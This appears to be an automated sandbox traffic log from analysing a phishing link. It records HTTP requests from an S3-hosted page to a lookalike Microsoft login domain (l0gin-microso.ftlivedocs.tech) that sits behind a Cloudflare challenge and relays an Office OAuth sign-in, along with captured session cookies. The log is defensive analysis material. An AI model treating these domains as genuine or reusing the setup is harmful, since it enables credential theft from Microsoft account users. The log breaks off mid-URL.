            Source: global trafficHTTP traffic detected: GET /media/GGrR89_WgAAgrOI?format=jpg&name=large HTTP/1.1Host: pbs.twimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://crewbloom.s3.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /media/GGrR89_WgAAgrOI?format=jpg&name=large HTTP/1.1Host: pbs.twimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: crewbloom.s3.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://crewbloom.s3.amazonaws.com/34873.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /KUtIdFka HTTP/1.1Host: l0gin-microso.ftlivedocs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://crewbloom.s3.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: l0gin-microso.ftlivedocs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/1.1Host: l0gin-microso.ftlivedocs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/1.1Host: l0gin-microso.ftlivedocs.techConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/8cd56a496a3b5e6a HTTP/1.1Host: l0gin-microso.ftlivedocs.techConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56a630cf741e3&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56a630cf741e3&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: l0gin-microso.ftlivedocs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://l0gin-microso.ftlivedocs.tech/KUtIdFkaAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/147669712:1728044744:0OaiWMyJW7ZPxlqedXMft6P244b4nMflF1Cf4AK8E-k/8cd56a630cf741e3/fc3fc94e9e3547a HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cd56a630cf741e3/1728047464607/YBBtqSrR-kb7LqJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cd56a630cf741e3/1728047464607/YBBtqSrR-kb7LqJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8cd56a630cf741e3/1728047464610/6315a5703f342bce662661e8fa8e5cfbec36c51d90ea70cfa211f89c976d3430/n-8rMprBONH9scU HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/147669712:1728044744:0OaiWMyJW7ZPxlqedXMft6P244b4nMflF1Cf4AK8E-k/8cd56a630cf741e3/fc3fc94e9e3547a HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /KUtIdFka?S=UmxuHlo HTTP/1.1Host: l0gin-microso.ftlivedocs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://l0gin-microso.ftlivedocs.tech/KUtIdFkaAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; x-ms-gateway-slice=estsfd
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: l0gin-microso.ftlivedocs.techConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://l0gin-microso.ftlivedocs.tech/KUtIdFkaAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; x-ms-gateway-slice=estsfd
            Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: www.ftlivedocs.techConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5
            Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 HTTP/1.1Host: l0gin-microso.ftlivedocs.techConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; x-ms-gateway-slice=estsfd; fpc=AiTvsUNzDMhLtivCMH0SOIk; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe6JSh8XySIX2JZIyDEcAnTGHJW7xDRybzTrnJSMuljy1faq4uekBlYW6QepUzkeCCVeoETYsf77cKfqUAaCR3HLP0IdxhCl6lLOWFylALBPap_5Jy1OH6KOB0tgqhPeFvx9h3RpcXxRAQOONMX0l8end4UyP-YrFmgiLM0lyRyksgAA; stsservicecookie=estsfd; MUID=0572C4040C3160E33E86D10A0D3661F9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_JQnUxWSvwsd9FrpspQmznw2.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://l0gin-microso.ftlivedocs.techsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://l0gin-microso.ftlivedocs.tech/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ98s32esN_GOxDd6BxYK5bGLDx5Op0mZGALvw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true HTTP/1.1Host: l0gin-microso.ftlivedocs.techConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://l0gin-microso.ftlivedocs.tech/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638636442697330204.NjIwZWJjNjEtNmMyNi00NTY5LWFhMWItYzQ4NTQyOWEzNGQ0MjMxNjBhODctYjRiNy00ZmQ5LWI0MzMtNWU1NmMxYjE0NWMx&ui_locales=en-US&mkt=en-US&client-request-id=37a08538-dff5-407d-be68-819033033a7a&state=KXouNT3DCC4nJGmZ0UPqr43DvOETQcMOHzyW3XKW_GmmSSP1vhdbuw5XASgqJ79HETi6JwhHJ6QWBKwBMy02TUIwHPB3pd6CKYG_YWqx9kPhyBezozkFI1hhf1DwNAMV6i3WbD94ziRYYdhiW7ILPzoTsrP8EPqDjpPTPwsGlE2ddaYguV0DrAR1iKncN8RtOGlb_uoJSY4fDM1dafLvW1gf5IX7c3_kF1zQXY4vcldCPOaUyZ